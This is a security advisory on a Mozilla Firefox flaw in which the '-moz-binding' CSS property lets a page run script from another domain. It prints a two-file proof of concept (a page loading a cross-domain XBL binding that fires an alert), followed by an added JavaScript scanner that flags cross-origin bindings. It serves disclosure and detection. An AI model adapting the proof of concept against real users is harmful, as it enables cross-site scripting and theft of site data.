source: https://www.securityfocus.com/bid/16427/info

Mozilla Firefox is prone to a security vulnerability that may let a Web page execute malicious script code in the context of an arbitrary domain.

The issue affects the '-moz-binding' property.

This could allow a malicious site to access the properties of a trusted site and facilitate various attacks including disclosure of sensitive information.

http://domain1/path/to/page.html :

<html>
<head>
<style>
body {
  -moz-binding: url("http://domain2/path/to/xbl.xml#xss");
}
</style>
</head>
<body>
</body>
</html>

http://domain2/path/to/xbl.xml :

<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl" xmlns:html="http://www.w3.org/1999/xhtml">
<binding id="xss">
<implementation>
<constructor>
alert("XBL XSS");
</constructor>
</implementation>
</binding>
</bindings>
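
For reviewing stylesheets or user-supplied CSS for the pattern shown above, the following added example (not part of the advisory or of Mozilla's code) lists '-moz-binding' declarations whose XBL URL resolves to a different origin than the page. The function names and the second and third sample rules are assumptions made for illustration; the check is textual and goes slightly beyond the advisory's case by also handling CSS comments, backslash escapes and relative URLs.

```javascript
// Added example (not from the advisory): list -moz-binding declarations whose
// XBL document is served from a different origin than the page that uses them.

// Decode CSS backslash escapes so "-moz-b\69nding" reads as "-moz-binding".
function decodeCssEscapes(text) {
  const esc = /\\(?:([0-9a-fA-F]{1,6})[ \t\r\n\f]?|([^\r\n\f]))/g;
  return text.replace(esc, (_, hex, ch) => {
    if (ch !== undefined) return ch;
    const cp = parseInt(hex, 16);
    return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : "\ufffd";
  });
}

// source: raw CSS or HTML text; pageUrl: URL of the page that applies it.
function findCrossOriginBindings(source, pageUrl) {
  const pageOrigin = new URL(pageUrl).origin;
  // Strip CSS comments first, then decode escapes, then match declarations.
  const css = decodeCssEscapes(source.replace(/\/\*[\s\S]*?\*\//g, ""));
  const decl = /-moz-binding\s*:\s*url\(\s*(["']?)([^"')]*)\1\s*\)/gi;
  const findings = [];
  for (const m of css.matchAll(decl)) {
    let target;
    try {
      target = new URL(m[2].trim(), pageUrl); // resolves relative URLs
    } catch {
      findings.push({ url: m[2], reason: "unparseable URL" });
      continue;
    }
    if (target.origin !== pageOrigin) {
      findings.push({ url: target.href, reason: "cross-origin XBL binding" });
    }
  }
  return findings;
}

// First sample is the advisory's page.html rule; the other two are constructed.
const PAGE = "http://domain1/path/to/page.html";
const SAMPLES = [
  'body { -moz-binding: url("http://domain2/path/to/xbl.xml#xss"); }',
  "div { -moz-b\\69nding : /* c */ url( http://domain2/xbl.xml#xss ); }",
  'p { -moz-binding: url("bindings/local.xml#ok"); }',
];
function scanSamples() {
  return SAMPLES.map((css) => findCrossOriginBindings(css, PAGE));
}
console.log(JSON.stringify(scanSamples()));
```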